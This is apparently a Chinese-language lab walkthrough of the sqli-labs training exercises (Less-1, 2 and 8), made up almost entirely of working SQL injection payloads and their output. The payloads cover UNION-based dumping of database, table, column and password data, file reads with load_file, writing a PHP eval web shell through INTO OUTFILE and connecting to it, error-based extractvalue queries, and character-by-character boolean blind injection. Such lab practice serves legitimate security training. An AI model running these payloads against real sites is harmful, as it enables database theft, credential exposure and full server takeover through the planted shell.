sqlilibs闯关

less-1：单引号注入

?id=1 正常返回

?id=1" 正常返回

?id=1' 返回错误

考虑可能是单引号注入，拼接sql语句

爆数据路个数: ?id=1' order by 4 --+ 错误 ?id=1' order by 3 --+正常 猜测有三个数据库

一、正常流程爆破

爆库名：?id=1' union select 1,2,3 --+

                ?id=-1' union select 1,user(),database() --+   用户：root@localhost  数据库名：security

爆表名：?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+     表名：emails,referers,uagents,users

爆列名：?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+   列名：USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password

爆数据项：?id=-1' union select 1,group_concat(username),group_concat(password) from users --+

username:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4

password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

二、文件读写

尝试可否读文件：?id=-1' union select 1,load_file('E:\\xxx\\WWW\\xxx\\readme.txt'),3 --+

尝试可否写入一句话木马：?id=-1' union select 1,"<?php @eval($_POST['x']);?>",3 into outfile 'E:\\xxx\\WWW\\shell.php' --+ 成功 蚁剑链接 成功

三、盲注、报错

回显报错：（less-2）

        ?id=1 and(select extractvalue(1,concat('~',(select database()))))      XPATH syntax error: '~security'

        ?id=1 and(select extractvalue(1,concat(0x7e,@@version)))     XPATH syntax error: '~5.7.26'

        ?id=1 and (select extractvalue(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())))       XPATH syntax error: ',referers,uagents,users'

        http://?id=1 and (select extractvalue(1,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema ='security' limit 0,1)))   XPATH syntax error: ',username,password'

        ?id=1 and (select extractvalue(1,concat(0x7e,(select group_concat(username) from users limit 0,1))))      XPATH syntax error: '~Dumb,Angelina,Dummy,secure,stup'

         ?id=1 and (select extractvalue(1,concat(0x7e,(select group_concat(password) from users limit 0,1))))     XPATH syntax error: '~Dumb,I-kill-you,p@ssword,crappy'

延时注入：（less-2）

时间盲注（延迟注入）-CSDN博客

布尔盲注：  (less-8)

1.获取数据库位数：

http://localhost/sqlilabs/Less-8/?id=1' and length(database())>10 --+ 错误

http://localhost/sqlilabs/Less-8/?id=1' and length(database())<10 --+ 正确

http://localhost/sqlilabs/Less-8/?id=1' and length(database())<9 --+   正确

http://localhost/sqlilabs/Less-8/?id=1' and length(database())<8 --+   错误，所以数据库位数为8

2.获取数据库名称：

http://localhost/sqlilabs/Less-8/?id=1' and left(database(),1)='s' --+ 数据库第一位's'

http://localhost/sqlilabs/Less-8/?id=1' and left(database(),2)='se' --+ 多次遍历可得到数据库名称'security'

3.判断数据库中的表的数量：

?id=1' and  (select count(table_name) from information_schema.tables where table_schema='security')=4 --+  正确

4.判断表名长度：

?id=1' and length((select table_name from information_schema.tables where table_schema='security' limit 0,1))=6 --+ 正确，说明第一个表长6位

?id=1' and length((select table_name from information_schema.tables where table_schema='security' limit 1,1))=8 --+ 正确，同理四个表长分别为：6、8、7、5

5.判断表名：

?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>65 --+    ture

?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))<90 --+    false

?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))<110 --+   ture,最终可以得出

?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101 --+  说明第一张表的第一位字母ascii为101，即'e'

?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1))=109 --+  第一张表的第二位字母为'm',最终将得出'emails'

?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1))=114 --+  可得出第二章表的第一个字母为：'r',最终可得到所有表名

6.判断表中列数量:

?id=1' and (select count(column_name) from information_schema.columns where table_name='emails')=2 --+

7.判断列名长度：

?id=1' and length((select column_name from information_schema.columns where table_name='emails' limit 0,1))=2 --+  第一列名长2位

?id=1' and length((select column_name from information_schema.columns where table_name='emails' limit 1,1))=8 --+ 第二列名长8位

8.判断列名

?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 1,1),1,1))=101 --+  猜出第二列名第一个字母是'e',最终得出'email_id'

9.判断数据长度
?id=1' and length((select email_id from security.emails limit 0,1))=16 --+

10.猜数据

?id=1' and ascii(substr((select email_id from security.emails limit 0,1),1,1)) =68 --+